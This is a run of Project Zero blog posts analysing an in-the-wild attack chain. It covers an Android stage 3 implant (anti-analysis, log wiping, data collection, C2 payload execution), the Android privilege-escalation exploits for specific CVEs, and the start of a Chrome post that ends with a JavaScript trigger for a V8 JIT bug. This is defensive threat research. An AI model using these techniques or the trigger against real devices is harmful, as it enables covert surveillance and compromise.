The binary will then iterate through the process’s open file descriptors 0-2 (usually stdin, stdout, and stderr) and points them to /dev/null. This will prevent output messages from appearing which may lead a user or others to detect the presence of the exploit chain. The code will then iterate through any other open file descriptors (/proc/self/fd/) for the process and close any that include “pipe:” or “anon_inode:” in their symlinks.  It will also close any file descriptors with a number greater than 32 that include “socket:” in the link and any that don’t include /data/dalvik-cache/arm or /dev/ in the name. This may be to prevent debugging or to reduce accidental damage to the rest of the system.

The thread will then call into the function that includes significant functionality for the main behavior of the binary. It decrypts data, sets up configuration data, performs anti-analysis and debugging checks, and finally contacts the C2 server to download the next stage and executes it. This can be considered the main control loop for Stage 3.

The rest of this post explains the technical details of the Stage 3 binary’s behavior, categorized.

Obfuscation

Stage 3 uses quite a few different layers of obfuscation to hide the behavior of the code. It uses a similar string obfuscation technique to stage 2. Another way that the binary obfuscates its behavior is that it uses a hash table to store dynamic configuration settings/status. Instead of using a descriptive string for the “key”, it uses a series of 16 AES-decrypted bytes as the “keys” that are passed to the hashing function.The binary encrypts its static configuration settings, communications with the C2, and a hash table that stores dynamic configuration setting with AES. The state.parcel file that is saved on the device is XOR encoded. The binary also includes multiple techniques to make it harder to understand the behavior of the device using dynamic analysis techniques. For example, it monitors what is mapped into the process’s memory, what file descriptors it has opened, and sends very detailed information to the C2 server.

Similar to the previous stages, Stage 3 seems to be well engineered with a variety of different techniques to make it more difficult for an analyst to determine its behavior, either statically or dynamically. The rest of this section will detail some of the different techniques.

String Obfuscation

The vast majority of the strings within the binary are obfuscated. The obfuscation method is very similar to that used in previous stages. The obfuscated string is passed to a deobfuscation function prior to use. The obfuscated strings are designated by 0x7E7E7E (“~~~”) at the end of the string. To deobfuscate these strings, we used an IDAPython script using flare_emu that emulated the behavior of the deobfuscation function on each string.

Configuration Settings Decryption

A data block within the binary, containing important configuration settings, is encrypted using AES256. It is decrypted upon entrance to the main control function. The decrypted contents are written back to the same location in memory where the encrypted contents were. The code uses OpenSSL to perform the AES256 decryption. The key and the IV are hardcoded into the binary.

Whenever this blog post refers to the “decrypted data block”, we mean this block of memory. The decrypted data includes things such as the C2 server url, the user-agent to use when contacting the C2 server, version information and more. Prior to returning from the main control function, the code will overwrite the decrypted data block to all zeros. This makes it more difficult for an analyst to dump the decrypted memory.

Once the decryption is completed, the code double checks that decryption was successful by looking at certain bytes and verifying their values. If any of these checks fail, the binary will not proceed with contacting the C2 server and downloading stage 4.

Hashtable Encryption

Another block of data that is 0x140 bytes long is then decrypted in the same way. This decrypted data doesn’t include any human-readable strings, but is instead used as “keys” for a hash table that stores configuration settings and status information. We’ll call this area the “decrypted keys block”. The information that is stored in the hash table can change whereas the configuration settings in the decrypted data block above are expected to stay the same throughout execution. The decrypted keys block, which serves as the hash table keys, is shown below.

00000000: 9669 d307 1994 4529 7b07 183e 1e0c 6225  .i....E){..>..b%

00000010: 335f 0f6e 3e41 1eca 1537 3552 188f 932d  3_.n>A...75R...-

00000020: 4bf4 79a4 c5fd 0408 49f4 b412 3fa3 ad23  K.y.....I...?..#

00000030: 837b 5af1 2862 15d9 be29 fd62 605c 6aca  .{Z.(b...).b`\j.

00000040: ad5a dd9c 4548 ca3a 7683 5753 7fb9 970a  .Z..EH.:v.WS....

00000050: fe71 a43d 78b1 72f5 c8d4 b8a4 0c9e 925c  .q.=x.r........\

00000060: d068 f985 2446 136c 5cb0 d155 ad8d 448e  .h..$F.l\..U..D.

00000070: 9307 54ba fc2d 8b72 ba4d 63b8 3109 67c9  ..T..-.r.Mc.1.g.

00000080: e001 77e2 99e8 add2 2f45 1504 557f 9177  ..w...../E..U..w

00000090: 9950 9f98 91e6 551b 6557 9c62 fea8 afef  .P....U.eW.b....

000000a0: 18b8 8043 9071 0f10 38aa e881 9e84 e541  ...C.q..8......A

000000b0: 3fa0 4697 187f fb47 bbe4 6a76 fa4b 5875  ?.F....G..jv.KXu

000000c0: 04d1 2861 6318 69bd 7459 b48c b541 3323  ..(ac.i.tY...A3#

000000d0: 16cd c514 5c7f db99 96d9 5982 f6f1 88ee  ....\.....Y.....

000000e0: f830 fb10 8192 2fea a308 9998 2e0c b798  .0..../.........

000000f0: 367f 7dde 0c95 8c38 8cf3 4dcd acc4 3cd3  6.}....8..M...<.

00000100: 4473 9877 10c8 68e0 1673 b0ad d9cd 085d  Ds.w..h..s.....]

00000110: ab1c ad6f 049d d2d4 65d0 1905 c640 9f61  [email protected]

00000120: 1357 eb9a 3238 74bf ea2d 97e4 a747 d7b6  .W..28t..-...G..

00000130: fd6d 8493 2429 899d c05d 5b94 0096 4593  .m..$)...][...E.

The binary uses this hash table to keep track of important values such as for status and configuration. The code initializes a CRC table which is used in the hashing algorithm and then the hash table is initialized. The structure that manages the hashtable shown below:

struct hashtable_mgr {

    int * hashtable_ptr;

    int maxEntries;

    int numEntries;

}

The first member of this struct points to the hash table which is allocated on the heap and has size 0x1400 bytes when it’s first initialized. The hash table uses sets of 0x10 bytes from the decrypted keys block as the key that gets passed to the hashing function.

There are two main functions that are used to interact with this hashtable throughout the binary: we’ll call them getValueFromHashtable and putValueInHashtable. Both functions take four arguments: pointer to the hashtable manager, pointer to the key (usually represented as an offset from the beginning of the decrypted keys block), a pointer for the value, and an int for the value length. Through the rest of this post, I will refer to values that are stored in the hash table. Because the key is a series of 0x10 bytes, I will refer to values as “the value for offset 0x20 in the hash table”. This means the value that is stored in the hashtable for the “key” that is 0x10 bytes and begins at the address of the start of the decrypted keys block + 0x20.

Each entry in the hashtable has the following structure.

struct hashtable_entry {

    BYTE * key_ptr;

    uint key_len;

    uint in_use;

    BYTE * value_ptr;

    uint value_len;

};

I have documented the majority of the entries in the hashtable here. I use the key’s offset from the beginning of the decrypted keys block as the “key” instead of typing out the series of 0x10 bytes. As shown in the linked sheet, the hashtable contains the dynamic variables that stage 3 needs to keep track of. For example, the filename where to save stage 4 and the install and failure counts.

The hashtable is periodically written to a file named uierrors.txt as described in the Persistence section. This is to save state in case the process exits.

Persistence

The whole exploit chain diligently cleans up after itself to leave as few indicators as possible of its presence. However, stage 3 does save a couple of files and adds environment variables in order to function. This is in addition to the stage 4 code which will be discussed in the “Executing the Next Stage” section. Each of the files and variables described in this section will be deleted as soon as they’re no longer needed, but they will be on a device for at least a period of time. For each of the files that are saved to the device, the directory path is often randomly selected from a set of potential paths. This makes it more time consuming for an analyst to detect the presence of the file on a device because the analyst would have to check 5 different paths for each file rather than 1.

state.parcel File

During startup, the code will record the current time in a file named state.parcel. After it records the current time at the beginning of the file, it will then check how many times per day this has been done by reading all of the times currently in the file. If there are less than 6 entries for the current day, the code proceeds. If there are 6 entries in the file from the current day and there are at least 5 entries for each of the previous 3 days, the binary will set a variable that will tell the code to clean up and exit. If there are 6 entries for the current day and there’s at least one entry for each of the past 3 days, the binary will clean up the persistent files for both this and other stages and then do a max sleep: sleep(0xFFFFFFFF), which is the equivalent of sleeping for over 136 years.

If the effective UID is 0 (root), then the code will randomly choose one of the following paths to write the file to:

  • /data/backup/
  • /data/data/
  • /data/
  • /data/local/
  • /data/local/tmp/

If the effective UID is not 0, then the state.parcel file will be written to whatever directory the binary is executing out of according to /proc/self/exe. The contents in state.parcel are obfuscated by XOR’ing each entry with 0xFF12EE34.

uierrors.txt - Hash table contents

Stage 3 periodically writes the hash table that contains configuration and static information to a file named uierrors.txt. The code uses the same process as for state.parcel to decide which directory to write the file too.

Whenever the hashtable is written to uierrors.txt it is encrypted using AES256. The key is the same AES key used to decrypt the configuration settings data block, but it generates a set of 0x10 random bytes to use as the IV. The IV is written to the uierrors.txt file first and then is followed by the encrypted hash table contents. The CRC32 of the encrypted contents of the file is written to the file as the last 4 bytes.

Environment Variables

On start-up, stage 3 will remove the majority of the environment variables set by the previous stage. It then sets its own new environment variables.

Environment Variable Name

Value

abc

Address of the decryption data block

def

Address of the function that will send logging messages to the C2 server

def2

Address of the function that adds logging messages to the error and/or informational logging message queues

ghi

Points the the decrypted block of hashtable keys

ddd

Address of the function that performs inflate (decompress)

ccc

Address of the function that performs deflate (compress)

0x10 bytes at 0x228CC

???

0x10 bytes at 0x228DC

Pointer to the string representation of the hex_d_uuid

0x10 bytes at 0x228F0

Pointer to the C2 domain URL

0x10 bytes at 0x22904

Pointer to the port string for the C2 server

0x10 bytes at 0x22918

Pointer to the beginning of the certificate

0x10 bytes at 0x2292C

0x1000

0x10 bytes at 0x22940

Pointer to +4AA in decrypted data block

0x10 bytes at 0x22954

0x14

0x10 bytes at 0x22698

Pointer to the user-agent string

PPR

Selinux status such as “selinux-init-read-fail” or “selinux-no-mdm”

PPMM

Set if there is no “persist.security.mdm.policy” string in /init

PPQQ

Set if the “persist.security.mdm.policy” string is in /init

Error Handling & Logging

The binary has a very detailed and mature logging mechanism. It tracks both “error” and “informational” logging messages. These messages are saved until they’re sent to the C2 server either when stage 3 is automatically reaching out to the C2 server, or “on-demand” by calling the subroutine that is saved as environment variable “def”. The subroutine saved as environment variable “def2”, adds messages to the error and/or informational message queues. There are hundreds of different logging messages throughout the binary. I have documented the meaning of some of the different logging codes here.

Clean-Up

This code is very diligent with trying to clean up its tracks, both while it's running and once it finishes. While it’s running, the binary forks a new process which runs code that is responsible for cleaning up logs while the other code is executing. This other process does the following to clean up stage 3’s tracks:

  • Connect to the socket /dev/socket/logd and clear all logs
  • Execute klogctl(5,0,0) which is SYSLOG_ACTION_CLEAR and clears the ring buffer
  • Unlink all of the files in the following directories:
  • /data/tombstones
  • /data/misc/audit
  • /data/system/dropbox
  • /data/anr
  • /data/log
  • Unlinks the file /cache/recovery/last_avc_msg_recovery

There are also a couple of different functions that clean up all potential dropped files from both this stage and other stages and remove the set environment variables.

Communications with C2 Server

The whole point of this binary is to download the next stage from the command and control (C2) server. Once the previous unpacking steps and checks are completed, the binary will begin preparing the network communications. First the binary will perform a DNS test, then gather device information, and send the POST request to the C2 server. If all these steps are successful, it will receive back the next stage and prepare to execute that.

DNS Test

Prior to reaching out to the C2 server, the binary performs a DNS test. It takes a pointer to the decrypted data block as its argument. First the function generates a random hostname that is between 8-16 lowercase latin characters. It then calls getaddrinfo on this random hostname. It’s trying to find a host that will cause getaddrinfo to return EAI_NODATA, meaning that no address information could be found for that host. It will attempt 3 different addresses before it will bail if none of them return EAI_NODATA. Some disconnected analysis sandboxes will respond to all hostnames and so the code is trying to detect this type of malware analysis environment.

Once it finds a hostname that returns EAI_NODATA, stage 3 does a DNS query with that hostname. The DNS server address is found in the decrypted block in argument 1 at offset 0x14C7. In this binary that is 8.8.8.8:53, the Google DNS server. The code will connect to the DNS server via a socket and then send a Type A query for the randomly generated host name and parse the response. The only acceptable response from the server is NXDomain, meaning “Non-Existent Domain”.  If the code receives back NXDomain from the DNS server, it will proceed with the code path that communicates with the C2 Server.

Handshake with the C2 Server

The C2 server hostname and port is read from the decrypted data block. The port number is at offset 0x84 and the hostname is at offset 0x4.

The binary first connects via a socket to the C2 server, then connects with SSL/TLS. The SSL/TLS certificate, a root certificate, is also in the decrypted data block at offset 0x4C7. The binary uses the OpenSSL library.

Collecting the Data to Send

Once it successfully connects to the C2 server via SSL/TLS, the binary will then begin collecting all the device information that it would like to send to the C2 server. The code collects A LOT of data to be sent to the C2 server.  Six different sets of information are collected, formatted, compressed, and encrypted prior to sending to the remote server. The different “sets” of data that are collected are:

  • Device characteristics
  • Application information
  • Phone location information
  • Implant status
  • Running processes
  • Logging  (error & informational) messages

Device Characteristics

For this set, the binary is collecting device characteristics such as the Android version, the serial number, model, battery temperature, st_mode of /dev/mem and /dev/kmem, the contents of /proc/net/arp and /proc/net/route, and more. The full list of device characteristics that are collected and sent to the server are documented here.

The binary uses a few different methods for collecting this data. The most common is to read system properties. They have 2 different ways to read system properties:

  • Call __system_property_get by doing dlopen(/system/lib/libc.so) and dlsym('__system_property_get').
  • Executing getprop in popen

To get the device ID, subscriber ID, and MSISDN, the binary uses the service call shell command. To call a function from a service using this API, you need to know the code for the function. Basically, the code is the number that the function is listed in the AIDL file. This means it can change with each new Android release. The developers of this binary hardcoded the service code for each android SDK version from 8 (Froyo) through 29 (Android 10). For example, the getSubscriberId code in the iphonesubinfo service is 3 for Android SDK version 8-20, the code is 5 for SDK version 21, and the code is 7 for SDK versions 22-29.

The code also collects detailed networking information. For example, it collects the MAC address and IP address for each interface listed under the /sys/class/net/ directory.

Application Information

To collect information about the applications installed on the device, the binary will send all of the contents of /data/system/packages.xml to the C2 server. This XML file includes data about both the user-installed and the system-installed packages on the device.

Phone Location Information

To gather information about the physical location of the device, the binary runs dumpsys location in a shell. It sends the full output of this data back to the C2 server. The output of the dumpsys location command includes data such as the last known GPS locations.

Implant Status

The binary collects information about the status of the exploits and subsequent stages (including this one) to send back to the C2 server. Most of these values are obtained from the hash storage table. There are 22 value pairs that are sent back to the server. These values include things such as the installation time and the “repair count”, the build id, and the major and minor version numbers for the binary. The full set of data that is sent to the C2 server is available here.

Running Processes

The binary sends information about every single running process back to the C2 server. It will iterate through each directory under /proc/ and send back the following information for each process:

  • Name
  • Process ID (PID)
  • Parent’s PID
  • Groups that the process belongs to
  • Uid
  • Gid

Logging Information

As described in the Error Processing section, whenever the binary encounters an error, it creates an error message. The binary will send a maximum of 0x1F of these error messages back to the C2 server. It will also send a maximum of 0x1F “informational” messages back to the server. “Info” messages are similar to the error messages except that they are documenting a condition that is less severe than an error. These are distinctions that the developers included in their coding.

Constructing the Request

Once all of the “sets” of information are collected, they are compressed using the deflate function. The compressed “messages” each have the following compressedMessage structure. The messageCode is a type of identification code for the information that is contained in the message. It’s calculated by calculating the crc32 value for the 0x10 bytes at offset 0x1CD8 in the decrypted data block and then adding the “identification code”.

struct compressedMessage {

    uint compressedDataLength;

    uint uncompressedDataLength;

    uint messageCode;

    BYTE * dataPointer;

    BYTE[4096] data;

};

Once each of the messages, or sets of data, have been individually compressed into the compressedMessage struct, the byte order is swapped to change the endianness and then the data is all encrypted using AES256. The key from the decrypted data block is used and the IV is a set of 0x10 random bytes. The IV is prepended to the beginning of the encrypted message.

The data is sent to the server as a POST request. The full header is shown below.

POST /api2/v9/pass HTTP/1.1

 User-Agent: Mozilla/5.0 (Linux; Android 6.0.1; SM-G600FY Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/3.0 Chrome/38.0.2125.102 Mobile Safari/537.3

Host: REDACTED:443

Connection: keep-alive

Content-Type:application/octet-stream

Content-Length:%u

Cookie: %s

The “Cookie” field is two values from the decrypted data block: sid and uid. The values for these two keys are base64 encoded values from the decrypted data block.

The body of the POST request is all of the data collected and compressed in the section above. This request is then sent to the C2 server via the SSL/TLS connection.

Parsing the Response

The response received back from the server is parsed. If the HTTP Response Code is not 200, it’s considered an error. The received data is first decrypted using AES256. The key used is the key that is included in the decrypted data block at offset 0x48A and the IV is sent back as the first 0x10 bytes of the response. After being decrypted, the byte order is swapped using bswap32 and the data is then decompressed using inflate. This inflated response body is an executable file or a series of commands.

C2 Server Cookies

The binary will also store and delete cookies for the C2 server domain and the exploit server domain. First, the binary will delete the cookie for the hostname of the exploit server that is the following name/value pair: session=<XXX>. This name/value is hardcoded into the decrypted data block within the binary. Then it will re-add that same cookie, but with an updated last accessed time and expire time.

Executing the Next Stage

As stated previously, stage 3’s role in the exploit chain is to check that the binary is not being analyzed and if not, collect detailed device data and send it to the C2 server to receive back the next stage of code and commands that should be executed. The detailed information that is sent back to the C2 server is likely used for high-fidelity targeting.

The developers of stage 3 purposefully built in a variety of different ways that the next stage of code can be executed: a series of commands passed to system or a shared library ELF file which can be executed by calling dlopen and dlsym, and more. This section will detail the different ways that the C2 server can instruct stage 3 to save and begin executing the next stage of code.

If the POST request to the C2 server is successful, the code will receive back either an executable file or a set of commands which it’ll “process”.  The response is parsed differently based on the “message code” in the header of the response. This “message code” is similar to what was described in the “Constructing the Request” section. It’s an identification code + the CRC32 of the 0x10 bytes at 0x25E30. When processing the response, the binary calculates the CRC32 of these bytes again and subtracts them from the message code. This value is then used to determine how to treat the contents of the response. The majority of the message codes distinguish different ways for the response to be saved to the device and then be executed.

There are a few functions that are commonly used by multiple message codes, so they are described here first.

func1 - Writes the response contents to files in both the /data/dalvik-cache/arm and /mnt directories.

This function does the following:

  1. Writes the buffer of the response to /data/dalvik-cache/arm/<file name keyed by 0x10 in hashtable>
  2. Gets a filename from mkstemp(“/mnt/XXXXXX”)
  3. Write the buffer of the response to a file with the name from step #2 + “abc” concatenated to the end: /mnt/XXXXXXabc
  4. Write a specific value from memory to the file with the name from step #2 with “xyz” concatenated to the end: /mnt/XXXXXXxyz. This specific value can be changed through the 2nd function that is exported by the stage 3 binary: d.

func2 - Fork child process and inject code using ptrace.

This function forks a new process where the child will call the function init from an ELF library, then the parent will inject the code from the response into the child process using ptrace. The ELF library that is opened with dlopen and then init is called on is named /system/bin/%016lx%016lx with both values being the address of the buffer pointer.

func3 - Writes the buffer of the reply contents to file and sets the permissions and SELinux attributes.

This function will write the buffer to either the provided file path in the third argument or it will generate a new file path.  If it’s generating a new temporary file name, the code will go down the following list of directory names beginning with /cache in the first directory that it can stat, it will create the temporary file using mkstemp(“%s/XXXXXX”).

  • /cache
  • /mnt/secure/asec
  • /mnt/secure/staging
  • /mnt/secure
  • /mnt/obb
  • /mnt/asec
  • /mnt
  • /storage

After the new file is created, the code sets the permissions on the file path to those supplied to the function as the fourth argument. Then it will set the SELinux attributes of the file to those passed in in the fifth argument.

The following section gives a simplified summary of how the response from the C2 server is handled based on the response’s message code:

  • 0x270F: Return 0.
  • 0x2710: The response is a shared library ELF (ET_DYN). Call func2 to fork a child process and inject the ELF using ptrace.
  • 0x2711: The response is a shared library ELF (ET_DYN). Save the file to a temp file on the device and then call dlopen and dlsym(“init”) on the ELF. A child process is then forked. The child process calls init.
  • 0x2712: The response is an ELF file. The file is written to a temporary file on the device. A child process is forked and that child process executes by calling execve on the file.
  • 0x2713: The response is an ELF file.  The file is written to a temporary file on the device using func3. A child process is forked and that child process executes it by calling system on the file.
  • 0x2714: It forks a child process and that child process calls system(<response contents>).
  • 0x2715: The response is executable code and is mmaped. Certain series of bytes are replaced by the address of dlopen, dlsym, and a function in the binary. Then the code is executed.
  • 0x4E20: If (D1_ENV == 0 && the code can NOT fstat /data/dalvik-cache/arm/system@[email protected]), go into an infinite sleep. Else, set a variable to 1.
  • 0x4E21: The response/buffer is an ELF with type ET_DYN (.so file). If D1_ENV environment variable is set, call func2, which spawns the child process and injects the buffer’s code into it using ptrace. If D1_ENV is not set, write the buffer to the dalvik-cache and /mnt directories through func1.
  • 0x4E22: This message increments the “uninstall_time” variable in the hashtable. For the value that is at key 0xA0 in the hashtable, it will increment it by the unsigned long value represented by the first 4 bytes in the response buffer.
  • 0x4E23: This message sets the “uninstall_time” variable in the hashtable. It will set the value at key 0xA0 in the hashtable to the unsigned long value represented by the first 4 bytes in the response buffer.
  • 0x4E25: Set the value at the key 0x100 in the hashtable to the unsigned long value represented by the first 4 bytes in the response buffer.
  • 0x4E26: If the third argument (filepath) to the function that is processing these responses is not NULL and it doesn’t previously exist, make the directory and then set the file permissions and SELinux attributes on the directory to the values passed in as the 4th and 5th arguments.
  • 0x4E27: Write the response buffer to a temporary file using func3.
  • 0x4E28: Call rmdir on a filepath.
  • 0x4E29: Call rmdir on a filepath, if it doesn’t exist delete uierrors.txt.
  • 0x4E2A: Copy an additional decrypted block to the end of the data that is the value for key 0xE0 in the hash table.
  • 0x4E2B: If (D1_ENV == 0 && we can fstat /data/dalvik-cache/arm/system@[email protected]), set certain variables to 1.
  • 0x4E2C: If the buffer is a 64-bit ELF and D1_ENV == 0, call func1 to write the buffer to the dalvik-cache and /mnt directories.

Conclusion

That concludes our analysis of Stage 3 in the Android exploit chain. We hypothesize that each Stage 2 (and thus Stage 3) includes different configuration variables that would allow the attackers to identify which delivered exploit chain is calling back to the C2 server. In addition, due to the detailed information sent to the C2 prior to stage 4 being returned to the device it seems unlikely that we would successfully determine the correct values to have a “legitimate” stage 4 returned to us.

It’s especially fascinating how complex and well-engineered this stage 3 code is when you consider that the attackers used all publicly known n-days in stage 2. The attackers used a Google Chrome 0-day in stage 1, public exploit for Android n-days in stage 2, and a mature, complex, and thoroughly designed and engineered stage 3. This leads us to believe that the actor likely has more device-specific 0-day exploits.

This is part 5 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To continue reading, see In The Wild Part 6: Windows Exploits.

In-the-Wild Series: Android Exploits

This is part 4 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the introduction post.

Posted by Mark Brand, Project Zero

A survey of the exploitation techniques used by a high-tier attacker against Android devices in 2020

Introduction

After one of the Chrome exploits has been successful, there are several (quite simple) stages of payload decryption that occur. Once we've got through that, we reach a much more complex binary that is clearly the result of some engineering work. Thanks to that engineering it's very simple for us to locate and examine the exploits embedded inside! For each privilege elevation, they have a function in the .init_array which will register it into a global list which they later use -- this makes it easy for them to plug-and-play additional exploits into their framework, but is also very convenient for us when reverse-engineering their framework:



Each of the "xyz_register" functions looks like the following, adding an entry to the global list with a probe function used to check whether the device is vulnerable to the given exploit, and to estimate likelihood of success, and an exploit function used to launch the exploit. These probe functions are then used to dynamically determine the best exploit to use based on runtime information about the target device.

 

Looking at the probe functions gives us an idea of which devices are supported, but we can already see something fairly surprising: this attacker is using entirely public exploits for their privilege elevations. Of course, we can't tell for sure that they didn't know about any of these bugs prior to the original public disclosures; but their exploit configuration structure contains an internal "name" describing the exploit, and those map very neatly to either public naming ("iovy", "cow") or CVE numbers ("0569", "0820" for exploits targeting CVE-2015-0569 and CVE-2016-0820 respectively), suggesting that these exploits were very likely developed after those public disclosures and not before.

In addition, as we'll see below, most of the exploits are closely related to public exploits or descriptions of techniques used to exploit the bugs -- adding further weight to the theory that these exploits were implemented well after the original patches were shipped.

Of course, it's important to note that we had a narrow window of opportunity during which we were capturing these exploit chains, and it wasn't possible for us to exhaustively test with different devices and patch levels. It's entirely possible that this attacker also has access to Android 0-day privilege elevations, and we just failed to extract those from the server before being detected. Nonetheless, it's certainly an interesting data-point to see an attacker pairing a sophisticated 0-day exploit for Chrome with, well, a load of bugs patched between 2 and 5 years ago.

Anyway, without further ado let's take a look at the exploits they did fit in here!

Common Techniques

addr_limit pipe kernel read-write: By corrupting the addr_limit variable in the task_struct, this technique gives a user-mode process the ability to read and write arbitrary kernel memory by passing kernel pointers when reading to and writing from a pipe.

Userspace shellcode: PXN support on 32-bit Android devices is quite rare, so on most 32-bit devices it was/is still possible to directly execute shellcode from the user-mode portion of the address space. See KEEN Lab "Emerging Defense in Android Kernel" for more information.

Point to userspace memory: PAN support is not ubiquitous on 64-bit Android devices, so it was (on older Android versions) often possible even on 64-bit devices for a kernel exploit to use this technique. See KEEN Lab "Emerging Defense in Android Kernel" for more information.

iovy

The vulnerabilities:

CVE-2015-1805 is a vulnerability in the Linux kernel handling read/write for pipe iovectors, leading to the use of an out-of-bounds struct iovec.

CVE-2016-3809 is an information leak, disclosing the address of a kernel sock structure.

Strategy: Heap-spray with fake iovectors using sendmmsg, race write, readv and mmap/munmap to trigger the vulnerability. This produces a single-use kernel write-what-where.

Subsequent flow: Use CVE-2016-3809 to leak the kernel address of a sock structure, then corrupt the socket member of the sock structure to point to userspace memory containing a fake structure (and function pointer table); execute userspace shellcode, elevating privileges.

Copy/Paste: ~90%. The exploit strategy is the same as public exploit code, and it looks like this was used as a starting point. The authors did some additional work, presumably to increase portability and stability, and the subsequent flow doesn't match any existing public exploit (that I found), but all of the techniques are publicly known.


Additional References: KEEN Lab "Talk is Cheap, Show Me the Code".

iovy_pxn2

The vulnerabilities: Same as iovy, plus:
P0-822 is an information leak, allowing the reading of arbitrary kernel memory.

Strategy: Same as above.

Subsequent flow: Use CVE-2016-3809 to leak the kernel address of a sock structure, and use P0-822 to leak the address of the function pointer table associated with the socket. Then use P0-822 again to leak the necessary details to build a JOP chain that will clear the addr_limit. Corrupt one of the function pointers to invoke the JOP chain, giving the addr_limit pipe kernel read-write. Overwrite the cred struct for the current process, elevating privileges.

Copy/Paste: ~70%. The exploit strategy is the same as above, building the same primitive as the public exploit (addr_limit pipe kernel read-write). Instead of the public approach, they leverage the two additional vulnerabilities, which had public code available. It seems like the development of this exploit was copy/paste integration of the alternative memory-leak primitives, probably to increase portability. The code used for P0-822 is direct copy-paste (inner loop shown below).

iovy_pxn3

The vulnerabilities: Same as iovy.

Strategy: Heap-spray with pipe buffers. One thread each for read/write/readv/writev and the usual mmap/munmap thread. Modify all of the pipe buffers, and then run either "read and writev" or "write and readv" threads to get a reusable kernel read-write.

Subsequent flow: Use CVE-2016-3809 to leak the kernel address of a sock structure, then use kernel-read to leak the address of the function pointer table associated with the socket. Use kernel-read again to leak the necessary details to build a JOP chain that will clear the addr_limit. Corrupt one of the function pointers to invoke the JOP chain, giving the addr_limit pipe kernel read-write. Overwrite the cred struct for the current process, elevating privileges.

Copy/Paste: ~30%. The heap-spray technique is the same as another public exploit, but there is significant additional synchronization added to support multiple reads and writes. There's not really enough unique commonality to determine whether the authors started with that code as a reference or not.

0569

The vulnerability: According to the release notes, CVE-2015-0569 is a heap overflow in Qualcomm's wireless extension IOCTLs. This appears to be where the exploit name is derived from; however as you can see at the Qualcomm advisory, there were actually 15 commits here under 3 CVEs, and the exploit appears to actually target one of the stack overflows, which was patched as CVE-2015-0570.

Strategy: Corrupt return address; return to userspace shellcode.

Subsequent flow: The shellcode corrupts addr_limit, giving the addr_limit pipe kernel read-write. Overwrite the cred struct for the current process, elevating privileges.

Copy/Paste: 0%. This bug is trivial to exploit for non-PXN targets, so there would be little to gain by borrowing code.

Additional References: KEEN Lab "Rooting every Android".

0820

The vulnerability: CVE-2016-0820, a linear data-section overflow resulting from a lack of bounds checking.

Strategy & subsequent flow: This exploit follows exactly the strategy and flow described in the KEEN Lab presentation.

Copy/Paste: ~20%. The only public code we could find for this is the PoC attached to our bugtracker - it seems most likely that this was an independent implementation written after KEEN lab's presentation and based on their description.

Additional References: KEEN Lab "Rooting every Android".

COW

The vulnerability: CVE-2016-5195, also known as DirtyCOW.

Strategy: Depending on the system configuration their exploit will choose between using /proc/self/mem or ptrace for the write thread.

Subsequent flow: There are several different exploitation strategies depending on the target environment, and the full exploitation process here is a fairly complex state-machine involving several hops into different processes, which is likely necessary to support launching the exploit from within an isolated app context.

Copy/Paste: ~5%. The basic code necessary to exploit CVE-2016-5195 was probably copied from one of the many public sources, but the majority of the complexity here is in what is done next, and this doesn't seem to be similar to any of the public Android exploits.

9568

The vulnerability: CVE-2018-9568, also known as WrongZone.

Strategy & subsequent flow: This exploit follows exactly the strategy and flow described in the Baidu Security Lab blog post.

Copy/Paste: ~20%. The code doesn't seem to match the publicly available exploit code for this bug, and it seems most likely that this was an independent implementation written after Baidu's blog post and based on their description.

Additional References: Alibaba Security "From Zero to Root". 
Baidu Security Lab: "KARMA shows you offense and defense".

Conclusion

Nothing very interesting, which is interesting in itself!

Here is an attacker who has access to 0day vulnerabilities in Chrome and Windows, and the ability to develop new and very reliable exploitation techniques in order to exploit these vulnerabilities -- and yet their Android privilege elevation capabilities appear to consist entirely of exploits using public, documented techniques and n-day vulnerabilities.

It certainly seems like they have the capability to write Android exploits. The exploits seem to be based on publicly available source code, and their implementations are based on exploitation strategies described in public sources.

One explanation for this would be that they serve different payloads depending on the targeting, and we were only receiving a "low-value" privilege-elevation capability. Alternatively,  perhaps exploit server URLs that we had access to were specifically configured for a user that they know uses an older device that would be vulnerable to one of these exploits?

Based on all the information available, it's likely that they have more device-specific 0day exploits. We might just not have tested with a device/firmware version that they supported for those exploits and inadvertently missed their more modern exploits.

About the only solid conclusion that we can make is that attackers clearly still see value in developing and maintaining exploits for fairly old Android vulnerabilities, to the extent of supporting those devices long past when their original manufacturers provide support for them.

This is part 4 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To continue reading, see In The Wild Part 5: Android Post-Exploitation.

In-the-Wild Series: Chrome Exploits

This is part 3 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the introduction post.

Posted by Sergei Glazunov, Project Zero

Introduction

As we continue the series on the watering hole attack discovered in early 2020, in this post we’ll look at the rest of the exploits used by the actor against Chrome. A timeline chart depicting the extracted exploits and affected browser versions is provided below. Different color shades represent different exploit versions.

A timeline chart depicting the extracted exploits and affected browser versions.

All vulnerabilities used by the attacker are in V8, Chrome’s JavaScript engine; and more specifically, they are JIT compiler bugs. While classic C++ memory safety issues are still exploited in real-world attacks against web browsers, vulnerabilities in JIT offer many advantages to attackers. First, they usually provide more powerful primitives that can be easily turned into a reliable exploit without the need of a separate issue to, for example, break ASLR. Secondly, the majority of them are almost interchangeable, which significantly accelerates exploit development. Finally, bugs from this class allow the attacker to take advantage of a browser feature called web workers. Web developers use workers to execute additional tasks in a separate JavaScript environment. The fact that every worker runs in its own thread and has its own V8 heap makes exploitation significantly more predictable and stable.

The bugs themselves aren’t novel. In fact, three out of four issues have been independently discovered by external security researchers and reported to Chrome, and two of the reports even provided a full renderer exploit. While writing this post, we were more interested in learning about exploitation techniques and getting insight into a high-tier attacker’s exploit development process.

1. CVE-2017-5070

The vulnerability

This is an issue in Crankshaft, the JIT engine Chrome used before TurboFan. The alias analyzer, which is used by several optimization passes to determine whether two nodes may refer to the same object, produces incorrect results when one of the two nodes is a constant. Consider the following code, which has been extracted from one of the exploits:

global_array = [, 1.1];

 

function trigger(local_array) {

  var temp = global_array[0];

  local_array[1] = {};

  return global_array[1];

}

 

trigger([, {}]);

trigger([, 1.1]);

 

for (var i = 0; i < 10000; i++) {

  trigger([, {}]);

}

 

print(trigger(global_array));

